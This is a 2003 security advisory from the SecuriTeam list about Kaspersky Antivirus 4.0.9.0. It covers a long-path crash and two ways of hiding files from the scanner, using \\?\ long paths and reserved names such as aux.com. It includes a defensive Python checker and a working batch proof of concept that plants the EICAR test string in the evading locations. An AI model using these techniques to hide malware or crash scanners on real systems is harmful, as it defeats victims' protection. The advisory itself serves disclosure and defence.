[NT] Kaspersky Antivirus DoS (Long Path, AUX)
From: support@securiteam.com
Date: 02/15/03
From: support@securiteam.com To: list@securiteam.com Date: 15 Feb 2003 21:48:18 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
Beyond Security would like to welcome Tiscali World Online
to our service provider team.
For more info on their service offering IP-Secure,
please visit http://www.worldonline.co.za/services/work_ip.asp
- - - - - - - - -
Kaspersky Antivirus DoS (Long Path, AUX)
------------------------------------------------------------------------
SUMMARY
<http://www.kaspersky.com/> Kaspersky Antivirus (KAV) is a family of
antivirus products.
Several vulnerabilities were identified in these products. The most serious
one allows a user to crash the antivirus server remotely; write access to any
directory on the remote server is required.
1. Long path crash
2. Long path prevents malware from detection
3. Special name prevents malware from detection
DETAILS
Vulnerable systems:
* Kaspersky Antivirus version 4.0.9.0
1. Long path crash
The NTFS file system allows paths of almost unlimited length (roughly 32,767
characters). The Win32 API, however, rejects ordinary paths longer than
MAX_PATH (260 characters). Prefixing a path with \\?\ tells the Win32 API to
hand it to the file system as-is, skipping the length check and the usual path
normalization; this is a documented feature of the Windows API. A path longer
than MAX_PATH causes the KAV monitor service to crash, or to hang at 100% CPU
usage. Whether this can lead to code execution has not been researched.
2. Long path prevents malware from detection
A file stored under such a long path is also not detected by the antivirus
scanner, so malware can be hidden there.
3. Special name prevents malware from detection
With the \\?\ prefix it is also possible to create an NTFS file whose name is a
reserved DOS device name, such as aux.vbs or aux.com (without the prefix, Win32
maps such a name to the AUX device instead of a file). Malware in such a file
is not detected.
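The following Python script is an added example (not part of the advisory, and not code from Kaspersky or from the reporter) of the two checks a defender would want after reading the three items above: flag paths that exceed the Win32 MAX_PATH limit, flag file names that the Win32 layer would map to a reserved DOS device (aux.com, Nul.txt.bak, lpt1 and so on), and build the \\?\ extended-length form that a scanner must use to open such files at all. The function names, the MAX_PATH constant and the sample paths are constructed for illustration; the reserved-name rule it implements (take the last path component, cut at the first '.' or ':', ignore trailing spaces, compare case-insensitively against CON, PRN, AUX, NUL, COM1-COM9 and LPT1-LPT9) is the documented Win32 behaviour, and it generalizes the advisory's aux.com case to every reserved name.

```python
"""Added example: find files that an antivirus engine using plain Win32 path
rules (MAX_PATH, DOS device-name mapping) can fail to open, and build the
\\\\?\\ form needed to open them.  Not from the advisory; names are illustrative."""
import os
import re

MAX_PATH = 260          # Win32 MAX_PATH: 259 path characters plus the terminating NUL
EXT_PREFIX = "\\\\?\\"  # extended-length prefix: no length check, no normalization

# Names the Win32 layer maps to devices, case-insensitively, whatever the extension.
RESERVED = ({"CON", "PRN", "AUX", "NUL"}
            | {"COM%d" % i for i in range(1, 10)}
            | {"LPT%d" % i for i in range(1, 10)})


def reserved_device_base(name):
    """Return the reserved device name hidden in a file name, or None.

    Win32 (RtlIsDosDeviceName_U) looks only at the part of the name before the
    first '.' or ':' and ignores trailing spaces, so 'aux.com', 'Aux.vbs',
    'nul.txt.bak' and 'aux ' all resolve to a device rather than a file."""
    base = name.split(".", 1)[0].split(":", 1)[0].rstrip(" ").upper()
    return base if base in RESERVED else None


def extended_length(path):
    """Return the extended-length form of an absolute Win32 path.

    Drive paths get \\\\?\\, UNC paths get \\\\?\\UNC\\.  Forward slashes are not
    normalized behind the prefix, so they are converted first (assumption: the
    caller passes an absolute path, as the prefix requires)."""
    if path.startswith(EXT_PREFIX):
        return path
    path = path.replace("/", "\\")
    if path.startswith("\\\\"):
        return EXT_PREFIX + "UNC\\" + path[2:]
    return EXT_PREFIX + path


def strip_prefix(path):
    """Undo extended_length() so the checks below see what plain Win32 would see."""
    if path.startswith(EXT_PREFIX + "UNC\\"):
        return "\\\\" + path[len(EXT_PREFIX) + 4:]
    if path.startswith(EXT_PREFIX):
        return path[len(EXT_PREFIX):]
    return path


def classify(path):
    """Reasons a scanner using plain Win32 calls would fail to open this path."""
    plain = strip_prefix(path)
    reasons = []
    if len(plain) >= MAX_PATH:          # CreateFile without the prefix fails here
        reasons.append("long-path")
    for component in re.split(r"[\\/]", plain):
        device = reserved_device_base(component)
        if device:                       # CreateFile would open the device instead
            reasons.append("reserved-name:" + device)
    return reasons


def find_suspicious(paths):
    """Map each path that a naive scanner could skip to its list of reasons."""
    hits = {}
    for path in paths:
        reasons = classify(path)
        if reasons:
            hits[path] = reasons
    return hits


def scan_directory(root):
    """Walk a tree and report files a naive scanner could skip.

    On Windows pass extended_length(root) so os.walk itself is not stopped
    by MAX_PATH; on other systems an ordinary path works."""
    paths = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            paths.append(os.path.join(dirpath, name))
    return find_suspicious(paths)


# Constructed sample paths mirroring the advisory's three cases plus near-misses.
A = "A" * 200
SAMPLE_PATHS = [
    "c:\\windows\\notepad.exe",                       # ordinary file: no reason
    EXT_PREFIX + "c:\\" + "\\".join([A] * 7) + ".com",  # items 1 and 2: long path
    EXT_PREFIX + "c:\\aux.com",                       # item 3: reserved name
    "c:\\temp\\Nul.txt.bak",                          # reserved name, extra extension
    "c:\\temp\\auxiliary.vbs",                        # base name is not reserved
    "c:\\temp\\com10.dll",                            # only COM1-COM9 are reserved
]

if __name__ == "__main__":
    for path, reasons in find_suspicious(SAMPLE_PATHS).items():
        print(", ".join(reasons), "->", path[:60] + ("..." if len(path) > 60 else ""))
```

Run it against a real tree with scan_directory(extended_length(r"C:\")) on Windows; every reported path is one the engine should be opened with the \\?\ form and scanned explicitly, since the ordinary CreateFile call either fails (long path) or opens the device (reserved name).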
Exploit:
The following .bat file demonstrates the vulnerabilities.
1,2 Long path crash & Long path prevents malware from detection
@echo off
SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
mkdir \\?\c:\%A%
mkdir \\?\c:\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%\%A%
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*>\\?\c:\%A%\%A%\%A%\%A%\%A%\%A%\%A%.com
3. Special name prevents malware from detection
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*>\\?\c:\aux.com
ADDITIONAL INFORMATION
The information has been provided by <mailto:3APA3A@SECURITY.NNOV.RU> ZARAZA.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.